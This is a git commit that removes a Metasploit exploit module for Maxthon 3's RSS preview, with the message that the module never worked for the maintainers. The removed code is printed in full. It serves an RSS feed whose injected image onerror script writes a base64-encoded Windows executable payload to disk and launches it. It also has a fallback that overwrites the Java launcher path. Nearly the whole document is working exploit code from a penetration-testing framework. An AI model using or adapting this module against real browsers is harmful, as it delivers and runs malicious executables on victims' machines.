This never works for us. Gonna ditch it.

2012-12-07 13:02:26 -06:00 · 2012-12-07 13:02:26 -06:00 · 9838a2c75f
parent b0be8dc4df
commit 9838a2c75f
1 changed files with 0 additions and 116 deletions
--- a/modules/exploits/windows/browser/maxthon_rss_xcs.rb
+++ b/modules/exploits/windows/browser/maxthon_rss_xcs.rb
@ -1,116 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name' => 'Maxthon RSS Preview',
-			'Description' => %q{
-				RSS feed content is rendered by Maxthon in a trusted/privileged zone.
-				Injection in such privileged/trusted browser zone can be used to modify
-				configuration settings and execute arbitrary commands.
-			},
-			'License' => BSD_LICENSE,
-			'Author' =>
-				[
-					'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
-				],
-			'References' =>
-				[
-					['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-rss-rce.html'],
-				],
-			'Payload' =>
-				{
-					'DisableNops' => true,
-				},
-			'Platform'       => 'win',
-			'Targets' =>
-				[
-					['Maxthon 3 on Windows',{} ],
-				],
-
-			'DisclosureDate' => 'Nov 26 2012',
-
-			'DefaultTarget' => 0
-
-			))
-
-		register_options(
-			[
-				OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),
-				OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),
-			], self.class
-
-		)
-
-
-	end
-
-	def on_request_uri(cli, request)
-
-		jpath = datastore['JPATH']
-		javaurl = datastore['JAVAURL']
-
-		headers = {}
-		html_hdr = %Q^
-			<html>
-			<head>
-			<title>Loading</title>
-			^
-		html_ftr = %Q^
-			</head>
-			<body >
-			<h1>Loading</h1>
-			</body></html>
-			^
-
-		case request.uri
-
-			when get_resource()
-				print_status("Sending #{self.name} payload for request #{request.uri}")
-				p = regenerate_payload(cli)
-				if (p.nil?)
-					send_not_found(cli)
-					return
-				end
-				penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)
-				penc2 = Rex::Text.encode_base64(penc)
-
-				js = %Q|var fileTemp=new maxthon.io.File.createTempFile("test","exe");var fileObj=maxthon.io.File(fileTemp);maxthon.io.FileWriter(fileTemp);if(maxthon.program){maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");maxthon.program.Program.launch(fileTemp.name_,"C:"); } else {fileTemp.name_ = "#{jpath}"; maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");a=document.createElement("iframe");a.setAttribute("src","#{javaurl}");document.body.appendChild(a)}|
-
-
-				content = %Q|<?xml version="1.0" encoding="ISO-8859-1" ?>
-				<rss version="2.0">
-				<channel>
-				<description>Malerisch.net</description>
-				<link>http://blog.malerisch.net/</link>
-				<title>Malerisch.net</title>
-				<item>
-				<title>test</title>
-				<link>javascript:alert(window.location);</link>
-				<description>07/09/2008 - test &lt;img src=a onerror='#{js}'&gt;</description>
-				<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
-				</item>
-				</channel>
-				</rss>|
-			else
-				print_status("Sending 404 for request #{request.uri}")
-				send_not_found(cli)
-				return
-		end
-
-		send_response_html(cli, content, headers)
-		handler(cli)
-	end
-
-end